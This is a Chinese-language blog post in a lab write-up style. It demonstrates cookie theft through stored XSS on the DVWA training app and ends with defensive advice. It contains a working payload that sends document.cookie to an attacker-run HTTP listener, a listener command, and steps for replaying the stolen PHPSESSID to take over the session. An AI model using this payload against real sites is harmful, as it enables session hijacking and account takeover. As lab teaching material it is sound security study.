<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 8.1.2">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"byroins.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.28.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"github","dark":"atom-one-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"mac"},"fold":{"enable":true,"height":500},"language":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.json","localsearch":{"enable":true,"top_n_per_article":2,"unescape":true,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="Environment: PHP 7.3.4 + MySQL 5.7.26   Lab: DVWA   1.0 Cookie劫持1.1 基础部分01 什么是Cookie? 用户在浏览器中输入账号密码登录网站后, 接下来的每次请求, 服务器如何知道 “ 这个请求是刚才登录的那个用户发来的 “ ?  通过Cookie  自动携带: 浏览器每次向同一域名发送请求时, 会自动附带上该域名下的所有 Coo">
<meta property="og:type" content="article">
<meta property="og:title" content="Cookie-Hijacking">
<meta property="og:url" content="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/index.html">
<meta property="og:site_name" content="Byron">
<meta property="og:description" content="Environment: PHP 7.3.4 + MySQL 5.7.26   Lab: DVWA   1.0 Cookie劫持1.1 基础部分01 什么是Cookie? 用户在浏览器中输入账号密码登录网站后, 接下来的每次请求, 服务器如何知道 “ 这个请求是刚才登录的那个用户发来的 “ ?  通过Cookie  自动携带: 浏览器每次向同一域名发送请求时, 会自动附带上该域名下的所有 Coo">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/1.png">
<meta property="og:image" content="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/2.png">
<meta property="og:image" content="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/3.png">
<meta property="og:image" content="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/4.png">
<meta property="og:image" content="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/5.png">
<meta property="og:image" content="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/6.png">
<meta property="og:image" content="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/7.png">
<meta property="og:image" content="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/8.png">
<meta property="article:published_time" content="2026-07-22T14:00:00.000Z">
<meta property="article:modified_time" content="2026-07-22T08:08:21.122Z">
<meta property="article:author" content="Byron">
<meta property="article:tag" content="cookie">
<meta property="article:tag" content="dvwa">
<meta property="article:tag" content="session">
<meta property="article:tag" content="xss">
<meta property="article:tag" content="存储型xss">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/1.png">


<link rel="canonical" href="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/","path":"2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/","title":"Cookie-Hijacking"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Cookie-Hijacking | Byron</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/lozad.js/1.16.0/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>


  <script class="next-config" data-name="mermaid" type="application/json">{"enable":true,"theme":{"light":"default","dark":"dark"},"js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mermaid/11.10.1/mermaid.min.js","integrity":"sha256-BmQmdWDS8X2OTbrwELWK366LV6escyWhHHe0XCTU/Hk="}}</script>
  <script src="/js/third-party/tags/mermaid.js" defer></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="Byron" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Byron</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Web Application Security Research & Exploit Development</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="Searching..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-0-Cookie%E5%8A%AB%E6%8C%81"><span class="nav-number">1.</span> <span class="nav-text">1.0 Cookie劫持</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-1-%E5%9F%BA%E7%A1%80%E9%83%A8%E5%88%86"><span class="nav-number">1.1.</span> <span class="nav-text">1.1 基础部分</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-2-Cookie%E7%AA%83%E5%8F%96%E5%AE%9E%E6%88%98"><span class="nav-number">1.2.</span> <span class="nav-text">1.2 Cookie窃取实战</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-%E9%98%B2%E5%BE%A1%E5%BB%BA%E8%AE%AE"><span class="nav-number">1.3.</span> <span class="nav-text">1.3 防御建议</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Byron"
      src="/images/private/icon1.png">
  <p class="site-author-name" itemprop="name">Byron</p>
  <div class="site-description" itemprop="description">Documenting vulnerability reproduction, SRC bug bounty write-ups, and custom penetration testing tools.</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">7</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/byroins/penetration-testing" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;byroins&#x2F;penetration-testing" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/atom.xml" title="RSS → &#x2F;atom.xml" rel="noopener me"><i class="fa fa-rss fa-fw"></i>RSS</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://byroins.github.io/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/private/icon1.png">
      <meta itemprop="name" content="Byron">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Byron">
      <meta itemprop="description" content="Documenting vulnerability reproduction, SRC bug bounty write-ups, and custom penetration testing tools.">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Cookie-Hijacking | Byron">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Cookie-Hijacking
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>
      

      <time title="Created: 2026-07-22 22:00:00 / Modified: 16:08:21" itemprop="dateCreated datePublished" datetime="2026-07-22T22:00:00+08:00">2026-07-22</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/web-security/" itemprop="url" rel="index"><span itemprop="name">web-security</span></a>
        </span>
          , 
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/web-security/xss/" itemprop="url" rel="index"><span itemprop="name">xss</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">Views: </span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><blockquote>
<p>Environment: PHP 7.3.4 + MySQL 5.7.26</p>
</blockquote>
<blockquote>
<p>Lab: DVWA</p>
</blockquote>
<hr>
<h2 id="1-0-Cookie劫持"><a href="#1-0-Cookie劫持" class="headerlink" title="1.0 Cookie劫持"></a>1.0 Cookie劫持</h2><h3 id="1-1-基础部分"><a href="#1-1-基础部分" class="headerlink" title="1.1 基础部分"></a>1.1 基础部分</h3><p><strong>01 什么是Cookie?</strong></p>
<p>用户在浏览器中输入账号密码登录网站后, 接下来的每次请求, 服务器如何知道 “ 这个请求是刚才登录的那个用户发来的 “ ?  <code>通过Cookie</code></p>
<ul>
<li><strong>自动携带</strong>: 浏览器每次向同一域名发送请求时, 会自动附带上该域名下的所有 Cookie</li>
<li><strong>键值对结构</strong>: <code>Cookie: name=value; name2=value2</code></li>
<li><strong>作用范围</strong>: 由 <code>Domain</code> 和 <code>Path</code> 属性控制</li>
<li><strong>有效期</strong>: 由 <code>Expires</code> 或 <code>Max-Age</code> 决定, 若不设置则为“会话 Cookie”, 关闭浏览器即失效</li>
</ul>
<p><strong>攻击者关心的三个安全属性</strong>：</p>
<table>
<thead>
<tr>
<th>属性</th>
<th>作用</th>
<th>攻击视角</th>
</tr>
</thead>
<tbody><tr>
<td><code>HttpOnly</code></td>
<td>禁止 JavaScript 读取</td>
<td>开启后 <code>document.cookie</code> 读不到, 无法窃取 Cookie, 但仍可做钓鱼, CSRF</td>
</tr>
<tr>
<td><code>Secure</code></td>
<td>仅通过 HTTPS 传输</td>
<td>未设此属性时, HTTP 连接可被中间人窃听</td>
</tr>
<tr>
<td><code>SameSite</code></td>
<td>控制跨站请求是否携带 Cookie</td>
<td><code>Strict</code> 最严, <code>Lax</code> 允许 GET 跨站携带, <code>None</code> 全放行</td>
</tr>
</tbody></table>
<p><strong>02 什么是Session?</strong></p>
<p>Session 是保存在<strong>服务器端</strong>的用户会话数据. 它的工作流程：</p>
<ol>
<li>用户登录成功 → 服务器创建一个 Session, 并生成唯一的 Session ID</li>
<li>服务器把 Session ID 通过 <code>Set-Cookie</code> 头发给浏览器</li>
<li>浏览器保存这个 Cookie, 后续每次请求自动带回</li>
<li>服务器根据请求中的 Session ID, 查找对应的 Session 数据, 识别用户身份</li>
</ol>
<p><strong>Session 与 Cookie 的关系</strong>:</p>
<table>
<thead>
<tr>
<th>概念</th>
<th>存储位置</th>
<th>相当于</th>
</tr>
</thead>
<tbody><tr>
<td>Session</td>
<td>服务器端</td>
<td>保险柜, 存放用户的所有会话数据</td>
</tr>
<tr>
<td>Cookie(中的 Session ID)</td>
<td>浏览器端</td>
<td>保险柜的钥匙，证明你就是你</td>
</tr>
<tr>
<td>Session 劫持</td>
<td>拿到钥匙</td>
<td>攻击者窃取 Cookie 后, 用钥匙打开受害者的保险柜</td>
</tr>
</tbody></table>
<p><strong>攻击者视角核心认知</strong>: Session 数据本身不会被窃取(它在服务器里), 但只要拿到 Cookie 里的 Session ID, 就能冒充受害者.</p>
<p><strong>03 Cookie劫持核心:</strong></p>
<p>如果攻击者通过 XSS 漏洞获取了受害者的 Cookie, 就等于拿到了受害者的 “临时身份证” 攻击者可以将这个 Cookie 写入自己的浏览器, 完全以受害者的身份登录网站, 无需知道用户名和密码.</p>
<hr>
<h3 id="1-2-Cookie窃取实战"><a href="#1-2-Cookie窃取实战" class="headerlink" title="1.2 Cookie窃取实战"></a>1.2 Cookie窃取实战</h3><p><strong>01 环境准备:</strong></p>
<ul>
<li>Windows-DVWA靶场<ul>
<li>Level-Low</li>
</ul>
</li>
<li>Kali 攻击机<ul>
<li>IP: 10.0.0.201</li>
</ul>
</li>
</ul>
<p><strong>02 攻击步骤梳理:</strong></p>
<ul>
<li>确认XSS漏洞存在</li>
<li>编写Cookie窃取Payload</li>
<li>攻击机启动HTTP服务器</li>
<li>Payload注入</li>
<li>模拟受害者访问</li>
<li>Cookie会话劫持</li>
</ul>
<p>以下实操附截图:</p>
<ul>
<li><p><strong>漏洞确认</strong></p>
<p><img data-src="/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/1.png"></p>
<blockquote>
<p>如上图, 选择存储型XSS并构造Payload提交</p>
</blockquote>
<p><img data-src="/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/2.png"></p>
<blockquote>
<p>成功弹窗, 证明漏洞存在</p>
</blockquote>
<p><img data-src="/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/3.png"></p>
<blockquote>
<p>同时数据库成功写入一条记录</p>
</blockquote>
</li>
<li><p><strong>Payload构造</strong></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=<span class="string">&quot;new Image().src=&#x27;http://10.0.0.201:8000/?cookie=&#x27;+document.cookie&quot;</span>&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>Kali启动HTTP服务</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m http.server 8000</span><br></pre></td></tr></table></figure>

<p><img data-src="/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/4.png"></p>
<blockquote>
<p>进入监听…</p>
</blockquote>
</li>
<li><p><strong>Payload注入</strong></p>
<ul>
<li>如下图, 在注入内容时, 网站可能会做限制, 调用开发者工具修改对应属性</li>
</ul>
<p><img data-src="/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/5.png"></p>
<blockquote>
<p>修改 maxlength&#x3D;”500” 并提交</p>
</blockquote>
<p><img data-src="/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/6.png"></p>
<blockquote>
<p>数据库成功写入记录</p>
</blockquote>
</li>
<li><p><strong>受害者访问</strong></p>
<ul>
<li>新开页面登录靶场</li>
</ul>
</li>
<li><p><strong>Cookie劫持成功</strong></p>
<p><img data-src="/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/7.png"></p>
<blockquote>
<p>如上图, 受害者访问后, 服务成功获取用户的cookie数据, 若要登录该账户, 只需做以下操作</p>
</blockquote>
<ul>
<li>调用开发者工具 → Application → Storage(Cookies) → 替换PHPSESSID的Value</li>
</ul>
<p><img data-src="/2026/07/22/web-security/xss/2026-07-22-cookie-hijacking/8.png"></p>
<blockquote>
<p>成功执行后刷新页面</p>
</blockquote>
</li>
</ul>
<h3 id="1-3-防御建议"><a href="#1-3-防御建议" class="headerlink" title="1.3 防御建议"></a>1.3 防御建议</h3><ol>
<li>对输出进行 HTML 实体编码, 防止 XSS 注入</li>
<li>Cookie 设置 <code>HttpOnly</code> 属性, 禁止 JavaScript 读取</li>
<li>Cookie 设置 <code>Secure</code> 属性, 仅 HTTPS 传输</li>
<li>Cookie 设置 <code>SameSite=Lax</code> 或 <code>Strict</code>, 限制跨站携带</li>
<li>对用户输入长度做后端校验, 不依赖前端限制</li>
</ol>
<blockquote>
<p>以上防御措施可从根本阻断 XSS 注入, Cookie 窃取及会话劫持攻击链</p>
</blockquote>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="followme">
  <span>Welcome to my other publishing channels</span>

  <div class="social-list">

      <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
      </div>
  </div>
</div>

          <div class="post-tags">
              <a href="/tags/xss/" rel="tag"># xss</a>
              <a href="/tags/cookie/" rel="tag"># cookie</a>
              <a href="/tags/session/" rel="tag"># session</a>
              <a href="/tags/dvwa/" rel="tag"># dvwa</a>
              <a href="/tags/%E5%AD%98%E5%82%A8%E5%9E%8Bxss/" rel="tag"># 存储型xss</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2026/07/20/web-security/xss/2026-07-20-xss-bypass-decision-tree.md/" rel="prev" title="XSS-Bypass-Decision-Tree">
                  <i class="fa fa-angle-left"></i> XSS-Bypass-Decision-Tree
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






    <div class="comments utterances-container"></div>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Byron</span>
  </div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
<script class="next-config" data-name="utterances" type="application/json">{"enable":true,"repo":"byroins/penetration-testing","issue_term":"pathname","theme":"github-light"}</script>
<script src="/js/third-party/comments/utterances.js" defer></script>

</body>
</html>
